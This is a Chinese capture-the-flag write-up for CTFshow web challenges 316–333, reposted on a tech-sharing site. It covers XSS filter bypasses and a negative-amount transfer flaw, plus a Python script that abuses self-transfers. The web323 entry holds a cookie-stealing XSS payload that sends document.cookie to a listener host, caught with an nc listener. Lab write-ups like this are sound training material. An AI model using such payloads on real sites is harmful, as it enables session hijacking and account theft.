标签：xss headers flag CTFSHOW print import requests

web316

xss平台 https://xss.pt/xss.php
创建项目

选择默认模块

一直下一步，然后随便那个代码放到题目输入框中

再刷新下题目

最后看下项目


结束

web317、318、319

317过滤了script
318过滤了img
在那些代码中找没有script和img的然后出不来flag就多试几次，我试的这个是可以的

web320、321、322

过滤了空格 用tab键代替空格，代码还是用上面的

web323、324、325、326

过滤了iframe
<BODY onl oad=document.location='http://xxxx:5000?cookie='+document.cookie;>
输入后服务器开启监 nc -lvp 5000（bot会每隔一段时间访问输入的内容）
看监听到的内容会有flag

web327

收件人一定得是admin，在内容和发件人里面都填上payload(咱也不知道哪个可以)。
然后payload还是原来xss平台上的就可以，比如下面这种类型的

web328、329、330、331

用xss平台的超强模块，需要大家自己在网上找一个。（前面给的网站没有这个模块）

就可以得到页面的源码

html解码下就会有flag

web332

随便注册两个用户用其中一个给另外一个转账-999999999就可以购买flag了

web333

可以转账给自己，而且得保证自己最低有1块钱，写个脚本

import requests
import re
import time
x=5
url="http://6e9efd13-ce49-48cd-8eae-53fa92d01651.chall.ctf.show/api/amount.php"
url2="http://6e9efd13-ce49-48cd-8eae-53fa92d01651.chall.ctf.show/api/getFlag.php"
headers={'Cookie':'PHPSESSID=tatvacnnqeihmuic94f1ei7275'}  #自己登录后的sessionid
while True:
	print(x)
	t=x-1
	data={
	'u':'456', #注册的用户名
	'a':str(t)
	}
	r=requests.post(url,headers=headers,data=data)
	print(r.text)
	if(x>10000):
		r2=requests.get(url2,headers=headers)
		print(r2.text)
		break
	x+=t

标签：xss,headers,flag,CTFSHOW,print,import,requests
来源： https://blog.csdn.net/miuzzx/article/details/111644350

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。